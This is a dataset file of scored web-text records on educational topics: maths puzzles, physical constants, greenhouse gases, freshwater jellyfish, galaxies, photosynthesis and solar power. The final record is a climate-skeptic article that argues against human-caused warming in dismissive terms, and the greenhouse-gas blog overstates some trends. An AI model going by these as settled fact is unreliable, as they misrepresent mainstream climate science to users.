text
large_stringlengths
148
17k
id
large_stringlengths
47
47
score
float64
2.69
5.31
tokens
int64
36
7.79k
format
large_stringclasses
13 values
topic
large_stringclasses
2 values
fr_ease
float64
20
157
Consider the equation 1/a + 1/b + 1/c = 1 where a, b and c are natural numbers and 0 < a < b < c. Prove that there is only one set of values which satisfy this equation. Three frogs hopped onto the table. A red frog on the left a green in the middle and a blue frog on the right. Then frogs started jumping randomly over any adjacent frog. Is it possible for them to. . . . The nth term of a sequence is given by the formula n^3 + 11n . Find the first four terms of the sequence given by this formula and the first term of the sequence which is bigger than one million. . . . Take any whole number between 1 and 999, add the squares of the digits to get a new number. Make some conjectures about what happens in general. Powers of numbers behave in surprising ways. Take a look at some of these and try to explain why they are true. The picture illustrates the sum 1 + 2 + 3 + 4 = (4 x 5)/2. Prove the general formula for the sum of the first n natural numbers and the formula for the sum of the cubes of the first n natural. . . . Find the smallest positive integer N such that N/2 is a perfect cube, N/3 is a perfect fifth power and N/5 is a perfect seventh A serious but easily readable discussion of proof in mathematics with some amusing stories and some interesting examples. Liam's house has a staircase with 12 steps. He can go down the steps one at a time or two at time. In how many different ways can Liam go down the 12 steps? Show that if three prime numbers, all greater than 3, form an arithmetic progression then the common difference is divisible by 6. What if one of the terms is 3? Find some triples of whole numbers a, b and c such that a^2 + b^2 + c^2 is a multiple of 4. Is it necessarily the case that a, b and c must all be even? If so, can you explain why? Take any two digit number, for example 58. What do you have to do to reverse the order of the digits? Can you find a rule for reversing the order of digits for any two digit number? Find the largest integer which divides every member of the following sequence: 1^5-1, 2^5-2, 3^5-3, ... n^5-n. Make a set of numbers that use all the digits from 1 to 9, once and once only. Add them up. The result is divisible by 9. Add each of the digits in the new number. What is their sum? Now try some. . . . Can you see how this picture illustrates the formula for the sum of the first six cube numbers? What happens to the perimeter of triangle ABC as the two smaller circles change size and roll around inside the bigger circle? This article extends the discussions in "Whole number dynamics I". Continuing the proof that, for all starting points, the Happy Number sequence goes into a loop or homes in on a fixed point. Factorial one hundred (written 100!) has 24 noughts when written in full and that 1000! has 249 noughts? Convince yourself that the above is true. Perhaps your methodology will help you find the. . . . Explore the continued fraction: 2+3/(2+3/(2+3/2+...)) What do you notice when successive terms are taken? What happens to the terms if the fraction goes on indefinitely? Carry out cyclic permutations of nine digit numbers containing the digits from 1 to 9 (until you get back to the first number). Prove that whatever number you choose, they will add to the same total. The final of five articles which containe the proof of why the sequence introduced in article IV either reaches the fixed point 0 or the sequence enters a repeating cycle of four values. Imagine we have four bags containing a large number of 1s, 4s, 7s and 10s. What numbers can we make? How many pairs of numbers can you find that add up to a multiple of 11? Do you notice anything interesting about your results? Can you rearrange the cards to make a series of correct Advent Calendar 2011 - a mathematical activity for each day during the run-up to Christmas. A introduction to how patterns can be deceiving, and what is and is not a proof. Can you fit Ls together to make larger versions of themselves? Imagine we have four bags containing numbers from a sequence. What numbers can we make now? Pick a square within a multiplication square and add the numbers on each diagonal. What do you notice? Choose a couple of the sequences. Try to picture how to make the next, and the next, and the next... Can you describe your reasoning? Some puzzles requiring no knowledge of knot theory, just a careful inspection of the patterns. A glimpse of the classification of knots and a little about prime knots, crossing numbers and. . . . You can work out the number someone else is thinking of as follows. Ask a friend to think of any natural number less than 100. Then ask them to tell you the remainders when this number is divided by. . . . In this 7-sandwich: 7 1 3 1 6 4 3 5 7 2 4 6 2 5 there are 7 numbers between the 7s, 6 between the 6s etc. The article shows which values of n can make n-sandwiches and which cannot. Can you discover whether this is a fair game? This article invites you to get familiar with a strategic game called "sprouts". The game is simple enough for younger children to understand, and has also provided experienced mathematicians with. . . . When number pyramids have a sequence on the bottom layer, some interesting patterns emerge... In this third of five articles we prove that whatever whole number we start with for the Happy Number sequence we will always end up with some set of numbers being repeated over and over again. Prove that if a^2+b^2 is a multiple of 3 then both a and b are multiples of 3. We are given a regular icosahedron having three red vertices. Show that it has a vertex that has at least two red neighbours. Problem solving is at the heart of the NRICH site. All the problems give learners opportunities to learn, develop or use mathematical concepts and skills. Read here for more information. I start with a red, a blue, a green and a yellow marble. I can trade any of my marbles for three others, one of each colour. Can I end up with exactly two marbles of each colour? From a group of any 4 students in a class of 30, each has exchanged Christmas cards with the other three. Show that some students have exchanged cards with all the other students in the class. How. . . . A paradox is a statement that seems to be both untrue and true at the same time. This article looks at a few examples and challenges you to investigate them for yourself. Prove that the internal angle bisectors of a triangle will never be perpendicular to each other. Take any rectangle ABCD such that AB > BC. The point P is on AB and Q is on CD. Show that there is exactly one position of P and Q such that APCQ is a rhombus. There are four children in a family, two girls, Kate and Sally, and two boys, Tom and Ben. How old are the children? Can you cross each of the seven bridges that join the north and south of the river to the two islands, once and once only, without retracing your steps? A composite number is one that is neither prime nor 1. Show that 10201 is composite in any base. The diagram shows a regular pentagon with sides of unit length. Find all the angles in the diagram. Prove that the quadrilateral shown in red is a rhombus. Points A, B and C are the centres of three circles, each one of which touches the other two. Prove that the perimeter of the triangle ABC is equal to the diameter of the largest circle.
<urn:uuid:e64d882b-51cd-4dd6-af31-c92ea9d976c0>
3.171875
1,790
Content Listing
Science & Tech.
77.146735
One should separate the question into two parts, the first of which is philosophical, and the second physics. The philosophical question is resolved by understanding that there are "constants" which are just those that set the system of units, and these are constant for the simple reason that they define our conventional units. The unit-defining constants philosophically cannot change. They can only be determined relative to physical measurements using physical atoms and light, and these measurements serve to fix our units. The constants which are philosophically incapable of changing are listed below: - The speed of light c, which defines the unit of space given the unit of time. - Planck's constant, $\hbar$, which defines the unit of mass-energy in terms of the unit of inverse time. - Newton's constant, which defines the unit of mass-energy in terms of the unit of space (and in conjunction with the other two, fixes a unique unit of mass, length, and time, the Planck units) - Boltzmann's constant, which defines the Kelvin in terms of the Joule. - electromagnetic constants, which define the unit of charge In terms of Plack units, all physical constants are dimensionless. These are the quantities which are philosophically capable of changing (see this question: units and nature ) So the gravitational constant simply cannot change. It is philosophically meaningless to say that it does change. What you would really be saying is that atoms are changing size relative to Planck units. Here are some constants that can, in principle, change: - The charge of the electron in Planck charges (the square of this is called the fine structure constant). - The mass of the proton in Planck masses (this is more or less the exponential of the strong coupling at the Planck scale) - The Higgs VEV: this is one unnaturally small parameter in Planck units. - The cosmological consntant: this is the other unnaturally small parameter. The other dimensionless constants are rougly of the expected size. The electron-Higgs coupling is a bit small, so the electron is somewhat light compared to other lepton and quark masses, but to 1 part in a thousand, not one part in a billion, so it could still be a coincidence. Within string theory, all of these dimensional constants are quantities which can change, they are all associated with a particle which represents fluctuations in these quantities. These particles are determined by the geometry of the microscopic space-time. The constants which are constant are those whose low-energy dynamics fixes their value, so that small fluctuations return to where they started, and any change in their value requires energies of order the Planck energy. At low energies, or outside of string theory, the principle that fixes the charges and masses of the particles is renormalizability considerations. So that the reason the electron charge does not vary is that if it changes from place to place, it is a field, and no field can couple in a renormalizable way to the photon and electron-positron field. They are already dimension 4. The principle of renormalizability tells you that the only constants you expect to see in a quantum field theory which are natural are the dimensionless coefficients of dimension 4 interactions, like the electron charge, or macroscopic scales determined by logarithmic running, like the mass of the proton. The Higgs VEV is unnatural for this reason, it is a fine-tuned mass scale, and this suggests that there is something left that we don't understand about the Higgs mechanism, which will be sorted out once we have experimental data about the Higgs boson. The principle of renormalizability is only applicable in a scaling regime where all the energies are much lower than the Planck energy. In this regime, you also expect either Newton's constant to be truly constant, which is Einstein's gravity, or for there to be an extra massless scalar field interacting gravitationally, which is Brans Dicke theory. All other corrections are less renormalization relevant, and scale away at low energies (although Einstein gravity itself is not renormalizable, it is the leading surviving scaling term at low energy, so the renormalizability principle still works). Experimentally, we know that Brans-Dicke fields cannot be working at solar-system scales. Because of the philosophical freedom of choosing units, Brans and Dicke chose to express their theory in terms of the gravitational constant changing from place to place. This terminology is unfortunate. They could have just as easily framed it as the speed of light changing from place to place, and had the exact same theory. It is best to have G and c both constant, and consider their field as a new scalar field that varies from place to place, with no relation to the unit-defining constants.
<urn:uuid:c3bdbea6-b0c3-46e0-8612-8ff3b5dbfc32>
3.0625
1,013
Q&A Forum
Science & Tech.
34.552933
New presentation showing all three main greenhouse gases on one graph. Carbon dioxide’s post 1990 acceleration is sustained. Methane post 2007 renewed increase due to planetary feedback emissions sustained. Nitrous oxide still by far the fastest rising greenhouse gas, the most powerful of the 3 GHGs. Mauna Loa carbon dioxide and methane have changed little since last month. Methane is still on a rising trend due to post 2007 feedback emissions from the warming planet. Nitrous oxide continues to rise. More heat is being added to the climate system at an unprecedented rate, which has accelerated over the past decade due to all three GHGs. Arctic methane continues to rise due to feed back emissions. Atmospheric GHG concentrations correlate directly with radiative forcing, which shows how the total heat in the climate system increases-a much better indicator than surface temperature increase alone. Compared to 800,000 year ice core limit, the the total heat in the climate system from heat radiation of the three greenhouse gases is extremely high. Research suggests there is more heat in the climate system today than the past 15 million years. The atmospheric greenhouse concentrations show: - carbon dioxide’s post 2000 increased rate of increase persists, - methane’s post 2007 renewed increase due to feedback emissions from the warming planet (Arctic and tropical peatlands) persists at the same fast rate, so is not a temporary situation but an emergency in its own right, - nitrous oxide is for sure increasing the fastest and its post 2000 increased rate of increase persists. As its GWP is nearly 300 times CO2, nitrous oxide is now an extreme danger.
<urn:uuid:c999d879-412e-4040-871f-eaef924fbb3c>
3.53125
343
Knowledge Article
Science & Tech.
41.553235
Science subject and location tags Articles, documents and multimedia from ABC Science Monday, 22 April 2013 Average temperatures around the world in the last thirty years of the 20th century were higher than any other time in nearly 1400 years. Friday, 19 April 2013 Antarctica's abrupt deep freeze around 34 million years ago caused a plankton explosion that transformed Southern Ocean ecosystems, new research has found. Monday, 8 April 2013 A new study may have finally resolved debate on how America's famous Yellowstone supervolcano was formed. Friday, 22 March 2013 A mass extinction event 200 million years ago that wiped out half of all species on Earth was caused by volcanic activity. Thursday, 14 March 2013 Fossilised forms of a phallus-shaped invertebrate have shed light on a dramatic spurt in Earth's biodiversity that occurred half a billion years ago, a new study says. Monday, 11 March 2013 The ability of ecosystems to adapt to climate change has been put under the microscope and the news is good for tuna and tropical rainforests. Monday, 11 March 2013 Many of the world's diamonds, including most of those found in Western Australia's famous Argyle mine, may have begun as organic matter on the ocean floor, a study shows. Wednesday, 6 March 2013 ABC Open You walk on it every day but do you ever stop to think about the soil beneath your feet? Luckily there are scientists who do. Thursday, 28 February 2013 Craters caused by asteroid or comet impacts may have played an important role in the creation and evolution of life, say Australian scientists. Monday, 18 February 2013 17 Ask an Expert Is the process that is at the origin of coal still existent, why or why not, and where does proof of it exist? Friday, 15 February 2013 One of the largest ancient asteroid impact zones on Earth has been discovered in outback Australia. Thursday, 14 February 2013 Scientists studying a bulge on the Earth's surface where the crust is missing have found the exposed mantle contains more magnesium than usual making it lighter. Tuesday, 4 December 2012 26 Great Moments in Science Thawing permafrost could release an enormous amount of carbon dioxide and methane into the atmosphere. And the more it warms, the more greenhouse gases are released, writes Dr Karl. Friday, 23 November 2012 A South Pacific island identified on Google Earth and world maps does not exist. Monday, 19 November 2012 New Zealand's Mount Ruapehu is in danger of erupting as pressure builds in a subterranean vent, officials warn.
<urn:uuid:f08841b4-8351-4247-83d6-7720785eaa8b>
3
538
Content Listing
Science & Tech.
47.965657
Mysterious world of RNAs: CIRCULAR RNAs Regulating MicroRNAs The world of RNAs does not seems to stop surprising us, latest being CIRCULAR RNAs controlling gene expression. In past few decades we have come across many non traditional RNAs. While some were very short and some surprisingly long and some influenced gene expression by blocking other RNAs from being translated into protein. However one thing which was common to all RNAs was their linear form. Few circular RNAs were reported in plants and animals but they were dismissed as genetic errors or experimental artefacts. In two recently published articles in Nature journal describe new form of highly stable circular RNAs act as molecular ‘sponges’, by binding to and block¬ing tiny gene modulators called microRNAs. MicroRNAs (miRNAs) are important post-transcriptional regulators of gene expression that act by direct base pairing to target sites within untranslated regions of messenger RNAs. The discovery of circular RNAs once again proves that there is much more to RNA than a simple messenger between DNA and the proteins it encodes. In a bid to study circRNAs Systematically, Nikolaus Rajewsky group sequenced and computationally analysed human, mouse and nematode RNA and detected thousands of well-expressed, stable circRNAs, often showing tissue/developmental-stage-specific expression.. The work also clearly shows that a human circRNA, antisense to the cerebellar degeneration-related protein 1 transcript (CDR1as), is densely bound by microRNA (miRNA) effector complexes and harbours 63 conserved binding sites for the ancient miRNA ‘miR-7’. To functionally validate CDR1as, authors expressed human CDR1as in Zebrafish embryos showed disruption of midbrain development, a phenotype reproduced by loss of mir-7, suggesting that CDR1as is a miRNA antagonist. 1. Circular RNAs are a large class of animal RNAs with regulatory potency. Memczak S, Jens M, Elefsinioti A, Torti F, Krueger J, Rybak A, Maier L, Mackowiak SD, Gregersen LH, Munschauer M, Loewer A, Ziebold U, Landthaler M, Kocks C, le Noble F, Rajewsky N. Nature. 2013 Feb 27. doi: 10.1038/nature11928 2. Natural RNA circles function as efficient microRNA sponges. Hansen TB, Jensen TI, Clausen BH, Bramsen JB, Finsen B, Damgaard CK, Kjems J. Nature. 2013 Feb 27. doi: 10.1038/nature11993
<urn:uuid:700882d9-f266-4ec4-9256-a323cdfb84f3>
3.21875
584
Nonfiction Writing
Science & Tech.
42.228745
How do you predict fog? First, fog is simply a cloud at ground level. It's formed by water vapor cooling and condensing. Forecasters look for wet ground, light wind or no wind and clear skies. The clear skies and light winds allow the cooling needed to condense water vapor (from the wet ground) into the tiny water droplets that make up fog.
<urn:uuid:ba6f8c3d-1513-4cce-9919-2d0de7e6e8db>
3.234375
77
Knowledge Article
Science & Tech.
78.560286
Name: Catherine Barber How do you explain the oxidation process when combining energy, carbohydrates, protein, and fats? How is oxidation also related Any oxidation process involves the loss of electrons from atoms - and usually the combination of other atoms with oxygen in the process. Oxidation is the chemical process by which cells "get" their energy from the foods that we consume. After oxidation, the foods are left with less available chemical energy, and we pass those leftovers out of the body as Breathing gives us the oxygen needed for the oxidation that constantly occurs in all of our cells to provide the energy that keeps us alive. Let me know if you'd like more details. Click here to return to the Molecular Biology Archives Update: June 2012
<urn:uuid:b434d20e-5bb4-4f63-9944-d88d468fab80>
3.09375
161
Q&A Forum
Science & Tech.
29.496313
Color Your World Color the picture by clicking on a color swatch at the bottom of the image then click on the image where you want to apply that color. Color off-line by downloading and printing the pdf version. The sun is unique. It is among the top 10% (by mass) of stars in its neighborhood. It has the ideal size to support life on earth. It is a single star as most stars exist in multiple-star systems. A planet in a multiple-star system would suffer extreme temperature variations. It is our primary heat source for our weather. Learn more about weather and weather safety in JetStream - An Online School for Weather.
<urn:uuid:27619205-662a-4e6b-a1ce-c127a37dcbc0>
2.71875
136
Tutorial
Science & Tech.
65.862077
Discover the cosmos! Each day a different image or photograph of our fascinating universe is featured, along with a brief explanation written by a professional astronomer. December 20, 1998 Explanation: Is our Galaxy this thin? We believe so. The Milky Way, like NGC 891 pictured above, has the width of a typical spiral galaxy. Spirals have most of their bright stars, gas, and obscuring dust in a thin disk. This disk can be so thin the spiral galaxy appears edge-on like a compact disk seen sideways. The dark band across the middle is a lane of dust which absorbs light. Some of the billions of stars that orbit the center of NGC 891, however, appear to be moving too fast to just be traveling in circles. What causes this peculiar motion? One hypothesis is that NGC 891 has a large bar across its center -- a bar that would be obvious were we to see this galaxy face-on instead of edge-on. This false color picture was constructed from 3 near infrared images. Authors & editors: NASA Technical Rep.: Jay Norris. Specific rights apply. A service of: LHEA at NASA/ GSFC &: Michigan Tech. U.
<urn:uuid:fe9901a8-8bd1-48fc-b02b-b1a4e7dbe1a5>
3.984375
250
Knowledge Article
Science & Tech.
63.119069
In our earlier post we discussed why this bound they put forward was based on a weak argumentation. The essential point was assuming the highest energy photon had been emitted during a particular late peak in the low energy spectrum. Since that peak almost coincided with the arrival of the photon the resulting bound was very strong. There is however no knowing exactly when the photon was emitted. The most plausible assumption is that it wasn't emitted before the onset of the burst in the low energy regime. This assumption however gives a much weaker bound, pretty much exactly at the Planck scale. The paper got now published in Nature, but it is significantly toned down from the original claim. The "most secure and conservative new limit" is at 1.2 times the Planck scale. The limit of 102 times the Planck scale that arises from associating the 31-GeV photon with the 7th spike is still offered, but explained to be "not very secure." Seems to me the referees did a good job... The topic even made it into the New York Times. Dennis Overbye writes that 7.3 Billion Light-Years Later, Einstein’s Theory Prevails, and quotes the eternally optimistic Lee Smolin: The good news, astronomers said, is that more data expected from Fermi could decide the question. As Lee Smolin, a quantum gravity theorist from the Perimeter Institute for Theoretical Physics in Waterloo, Ontario, said, “So a genuine experimental test of a hypothesized quantum gravity effect is in progress.” New Scientist reports on Giovanni Amelino-Camelina's stomach aches, and SymmetryMagazine explains the why and how in a very recommendable article Gamma-ray burst restricts ways to beat Einstein’s relativity. For more details, see also our earlier post Constraining Modified Dispersion Relations with Gamma Ray Bursts.
<urn:uuid:78032ba1-48f0-45b9-8dcb-0478ed553bc6>
2.6875
384
Personal Blog
Science & Tech.
46.713763
Next: Mapping Files Up: Parallel I/O Previous: Parallel I/O Two ideas have been advanced which use the idea of giving hints to the compiler without changing the Fortran file semantics. The first is based on the observation that although the distribution of an array when it is written may be available to the compiler or runtime system, the distribution into which that array will be read cannot generally be known, even though the programmer may have this knowledge. So the proposal is to provide on a write a hint about how the data will be read. !HPF IO_DISTRIBUTE * :: a WRITE a, b, c !HPF IO_DISTRIBUTE * :: b When an array is written, it can be easily read back in the given distribution. The annotation can be associated with either the declaration or the write itself; in the first case it applies to all writes of the array, while in the second it only applies to the one statement. The intent is that meta-data is kept in the file system to record the ``right'' data layout. The advantages of this proposal include notation and efficiency. The second proposal is to give hints about the physical layout (number of spins, record length, striping function, etc.) of the file when it is opened. This uses the HPF array mapping mechanisms. (A file is a 1-dimensional array of records.) The syntax needs a ``name'' for the file ``template'': we suggest FILEMAP. The programmer can align/distribute FILEMAP (on I/O nodes), associate FILEMAP with a file on OPEN, etc. There are no changes in semantics or file system.
<urn:uuid:cbc626fb-187c-43c6-b1e4-21ec9322a0d2>
2.890625
347
Documentation
Software Dev.
51.432019
Electron Transport in Photosynthesis The above illustration draws from ideas in both Moore, et al. and Karp to outline the steps in the electron transport process that occurs in the thylakoid membranes of chloroplasts during photosynthesis. Both Photosystems I and II are utilized to split water to get electrons. Electron transport helps establish a proton gradient that powers ATP production and also stores energy in the reduced coenzyme NADPH. This energy is used to power the Calvin Cycle to produce sugar and other carbohydrates. The electron transport process outlined here is characteristic to the approach to photophosphorylation called "non-cyclic electron transport". There is also an electron transport process in the cyclic electron transport process which uses only Photosystem I to produce ATP without providing the reduced coenzymes necessary to proceed with further biosynthesis. Moore, et al.
<urn:uuid:c6e8a278-0c0b-4a7e-861c-cd7cda3a37a1>
3.28125
178
Knowledge Article
Science & Tech.
23.958234
We may be hundreds of miles away from the nearest ocean, but the Show-Me-State has jellyfish. Swimmers and skiers need not be alarmed, however. Although the tentacles of freshwater jellyfish are armed with stinging cells like those of their saltwater cousins, Missouri's freshwater jellyfish are only about the size of a quarter and pose no threat to people. The tiny stinging cells on tentacles of freshwater jellyfish are used to paralyze microscopic animals in the water called zooplankton. The jellyfish then consume these immobilized prey for nourishment. Freshwater jellyfish, Craspedacusta sowerbyi, likely originated in China, but the species was first described by a researcher in England during 1880. It has been reported in lakes, old quarries and ponds in the United States for over 100 years. Biologist Rudolf Bennitt provided the first Missouri record of freshwater jellyfish in 1930; however, people continue to be amazed when they encounter this invertebrate in Missouri waters. Some of the mystery associated with freshwater jellyfish can be attributed to the life cycle of this organism. Freshwater jellyfish spend much of their lives in an inconspicuous polyp stage on the bottom of lakes and tributary streams. Polyps are minute creatures, less than one-eighth-inch long, and live in colonies attached to underwater snags, logs and other structure. The polyps feed on a variety of other organisms, including zooplankton, worms and even larval fish. The polyps reproduce asexually by budding. Asexual budding is a process by which an outgrowth of cells from the body wall of one individual develops into a new individual with an identical genetic makeup. When polyps bud, the process usually results in production of more polyps-much like the process by which a strawberry plant sends out runners that develop into new plants. However, when environmental conditions are just right, polyps can produce buds that develop into medusa-free-swimming jellyfish. Unlike polyps, jellyfish represent a sexual stage in the life cycle, similar to the flowers of a strawberry plant. The jellyfish is umbrella-shaped, and its bell is fringed with numerous tentacles. By contracting its bell, the jellyfish moves rhythmically up through the water column until it reaches the surface. Then, it floats downward with tentacles extended to capture prey. Each jellyfish is either male or female, and they eventually release eggs and sperm into the water. Their fusion produces a fertilized egg that sinks to the lake bottom and develops into new polyps, starting the cycle over again. How much freshwater jellyfish affect the productivity of a fishery is unclear. When jellyfish are placed into an aquarium containing fish, the fish readily attempt to eat them but then quickly reject them. Anglers have reported a decrease of fishing success when jellyfish were present. Also, fin damage and death of young fish due to contact with the tentacles have been observed in the laboratory. On the other hand, it appears crayfish find freshwater jellyfish appealing. When we put jellyfish into aquaria containing crayfish, the crayfish consumed the jellyfish like children eating popcorn. Little is known about environmental factors that trigger production of freshwater jellyfish. Their occurrence is unpredictable. Large numbers appear like snowflakes in the water during some years but may not reappear until several years later, or not at all. In Missouri, during years when jellyfish are present, look for them from July through September, when surface water temperatures are near 80 degrees. Freshwater jellyfish are yet another example of the diverse and fascinating aquatic fauna inhabiting waters of the Show-Me-State.
<urn:uuid:f1e143fd-f80a-4fbc-a7dc-df70eaab0137>
3.640625
768
Knowledge Article
Science & Tech.
33.848446
1) You have specified width as %5x but there is a rule regarding width specifier in C. If the width of the number to be printed is more than the assigned width, the width specifier is ignored. So in the last column the number content cant be represented in the assigned width 5 so width limit has been ignored.Why width is greater than 5 i have explained in 3rd point. Now in 2nd point i tell %x vs unsigned char . 2) See friend you have declared variable 'n' as an unsigned char but you have used %x which is for unsigned hexadecimal int. So at the time of printing the value of n is promoted or technically you can say typecasted as an unsigned hexadecimal integer. It is not only in the case of unsigned char and %x. You should try dirrerent combinations on your compiler just like now you will get -5 by %d and for %u you will get some other interpretaion dependent on compiler properties whether it is 16-bit or 32-bit. now if you try unsigned int a=-5; result will be still same as previous. in first case you write int a=5 and in the second case you write unsigned int =5 but result is dependent on the interpretation so this is like such. This is about typecasting or you can say about interpretation by the compiler. when you say %x You yourself say to compiler that interpret it as a unsigned hexadecimal int. i hope its clear now, in case its not i suggest you to run little different programs and that too on many compilers. Programs like int x=7; printf("%f "x); etc etc .. you will surely get the point. Now i explain the out of the last column why its like fffffffe. 3) We consider the first run of the loop. here n=0x1. In a 32-bit compiler it will be represented in memory as 0000 0001 as char is provided 1 byte of memory.But afterwards when you typecast it as a unsigned hexadecimal integer the interpertation in a 32-bit compiler is 0000 0000 0000 0000 0000 0000 0000 0001 Well if you declare int n=1 or you declare unsigned int n=1 or you declare int n=0x1. the representation will be same. even if you use unsigned char n=1 the rightmost digit will be 1 and all others zero although the number of zeros may be less. Now in your looping statement by denoting %x you tell compiler to interpret the content as a unsigned hexadecimal int, so compiler provides it space as an hexadecimal and you do this opertion "~n" now by performing this operation the bit representation becomes like this 1111 1111 1111 1111 1111 1111 1111 1110. (caution-Remember that printf("%d",~n); case is different than printf("%d",n++); in the n++ case the value of variable in the memory gets updated too. but using printf("%d",~n) is similar using printf("%d",n+8).) So as per this new representaion of bits all bits are 1 except the rightmost. Now when it gets printed it gets printed like fffffffe. simple! 4)You have written " but it seems like it's being cast to a signed 32 bit value and sign extended by the %5x specifier." hmmm %x is not for signed hexadecimal int %x is for unsigned hexadecimal int so no point of assuming that minus sign got truncated. 5)In your progam you have used '~n' now just check different versions like this '-~n' or '-n' . this is for experiment purpose.
<urn:uuid:257be97d-5042-403d-a2ad-1da37f0bee81>
3.5
798
Q&A Forum
Software Dev.
72.035207
The Polar bear is animal that is admired around the world for its looks and cute appearance. For anyone who had never seen one of these animals in the world they would link them with the polar bears on the coke cola commercials. Don't let these cute looking animals fool you, as anyone who has seen them in the wild would tell you. These creatures are yet to be fully understood. Research is currently on the effects of global warming on the lives of the polar bear. Their behavior patterns sometimes are hard to understand but sometimes it appears they are smarter than we think. The research in this article is to do with the effect of global warming on the survival of the Polar Bear. The adaption that the polar bear may have to do could be impossible. The polar bears starve them selves from summer till autumn due to lack of food. This threatens to extend the period of starvation due to the warmer periods lasting longer. During the winter the polar bear does most of it's feeding. They go out on the frozen waters hunting for their favored prey ringed seal pups. This is done by waiting nearby a hole in the ice for the pups to come up for air and then with one bite dinner is theirs. The effects of this global warming is also affecting the people who live in the near by town as this means that the bears will be spending more time on the mainland. This could be a serious problem, as they have been known to cause large amounts of damage when they stray in to the towns.
<urn:uuid:6e28e6b4-3fa1-4c8d-a1df-d386da823c0b>
3.15625
327
Knowledge Article
Science & Tech.
65.218333
|Hugging the horizon, a dark red Moon greeted early morning skygazers in eastern Atlantic regions on December 21, as the total phase of 2010's Solstice Lunar Eclipse began near This well composed image of the event is a composite of multiple exposures following the progression of the eclipse from Tenerife, Canary Islands. Initially reflecting brightly on a sea of clouds and the ocean's surface itself, the Moon sinks deeper into eclipse as it moves from left to right across the sky. the Sun, the Moon was immersed in the darkest part of Earth's shadow as it approached the western horizon, just before sunrise came to Tenerife.|
<urn:uuid:622a9810-54ee-40f0-96ba-e85d69803ac9>
2.859375
143
Truncated
Science & Tech.
27.145657
The unconfined aquifer is the major source of water supply in west-central and southwestern Delaware. The aquifer, which is composed of quartz sand, gravel, clay, and silt, ranges in thickness from 20 to 200 feet. The water table ranges from land surface to about 20 feet below land surface. Analyses of water from wells distributed throughout the area were used to study processes controlling the chemical quality of the water in the unconfined aquifer. Please give proper credit to the Delaware Geological Survey. Delaware Geological Survey University of Delaware Delaware Geological Survey Building Newark, DE 19716 Mon - Fri; 8:00am to 4:30pm
<urn:uuid:558e54dd-6b9c-4258-895e-270720a29124>
3.46875
141
Knowledge Article
Science & Tech.
32.792231
According to the Los Angeles Times, L.A. Mayor Antonio Villaraigosa is advocating a proposal to install enough rooftop solar panels on buildings in the city by 2013 to power 100,000 households now served by the Department of Water and Power (DWP). According the MSNBC, a team led by former NASA executive and physicist John Mankins captured solar energy from a mountaintop in Maui and beamed it 92 miles to the main island of Hawaii. The long-range energy transmission experiment opens the possibility of sending solar energy from space to earth. Montgomery County Public Schools (MCPS) announced it will install solar photovoltaic (PV) systems on the roofs of several schools. This initiative will make MCPS the first school system in Maryland and the Washington, D.C., metropolitan area to launch a large-scale solar PV program. The Massachusetts Institute of Technology (MIT) recently reported a couple of developments that may help solar power enter the mainstream market. In one project, MIT reported new photovoltaic cells could be placed on windows without inhibiting views or light passage. According to USA Today, new technology developed by Silicon Valley startup SUNRGI could fast-track solar power by delivering it to the market in a year’s time at a price comparable to coal-fired electricity. In June 2008, San Francisco Mayor Gavin Newsom helped the city achieve a first when he signed a bill recently approved by the Board of Supervisors. Officials are touting the GoSolarSF program as the first-ever and largest solar program of its kind offered by a city in the country. A debate within political circles in the historic town of Marburg, Germany, and its regional government in Giessen pits the environmentally conscious against the very environmentally conscious and highlights the question of where to draw the line when it comes to mandating energy efficiency. PPL Renewable Energy announced plans in May 2008 to design, construct and operate a 1.7-megawatt solar-power system for Schering-Plough Corp. in Summit, N.J. When completed, the green energy project will be the largest rooftop solar installation in the United States. The business model of manhy electrical contractors does not involve outside sales, leaving those contractors out of position to approach the residential solar business, according to Bernie Kottlier, director, Green Building Solutions, Los Angeles Labor Management Cooperative Community (LALMCC). Those who have followed the solar photovoltaics (PV) industry for the last 15 years or more can be excused for feeling a tad skeptical about current claims that now the industry is on the verge of taking off.
<urn:uuid:3c0ee669-c370-48a5-8986-28aef8b438e4>
2.75
546
Content Listing
Science & Tech.
37.667526
Definition of Which of the following compounds shows aromatic properties? Any of a large class of organic compounds whose molecular structure includes one or more planar rings of atoms, usually but not always six carbon atoms. The ring's carbon-carbon bonds ( bonding) are neither single nor double but a type characteristic of these compounds, in which electrons are shared equally with all the atoms around the ring in an electron cloud. Preparing for JEE? Kickstart your preparation with new improved study material - Books & Online Test Series for JEE 2014/ 2015 @ INR 5,443/- For Quick Info Find Posts by Topics
<urn:uuid:2018cd21-05f8-44ea-bb33-b2ee3200d825>
3.140625
128
Content Listing
Science & Tech.
39.647834
From about A.D. 950 to 1250, the North Atlantic region of the globe experienced a period of higher-than-normal temperatures. Known as the Medieval Warm Period (MWP), it was a time in which crops could grow much further north than is now common and oceanic ice did not come as far south. Eventually the warming was reversed, and the world was plunged into the equally long Little Ice Age (LIA), lasting from about 1400 to 1700. This turn of events — significant warming in the pre-industrial period that corrected itself — would seem to present a problem for the theory of manmade global warming, which asserts that the Earth’s present alleged warming trend is primarily, if not solely, the result of human activity, specifically carbon dioxide emissions, and that it cannot be stopped absent a return to a pre-industrial world. Global-warming believers such as the Intergovernmental Panel on Climate Change (IPCC) have circumvented the inconvenient truths of MWP and LIA by claiming that both were strictly local events not reflective of global climate in general. Thus, they can then argue that carbon emissions, not cyclical climate changes, are the cause of the current, supposedly unprecedented phenomenon of rising global temperatures. Not anymore. A team of scientists led by Syracuse University geochemist Zunli Lu has discovered that the MWP and LIA reached all the way to Antarctica — in other words, over the entire world. Click here to read the entire article.
<urn:uuid:a0dcfb6a-72bd-4c26-8e6e-9841cd7bdae3>
3.78125
302
Truncated
Science & Tech.
40.777832
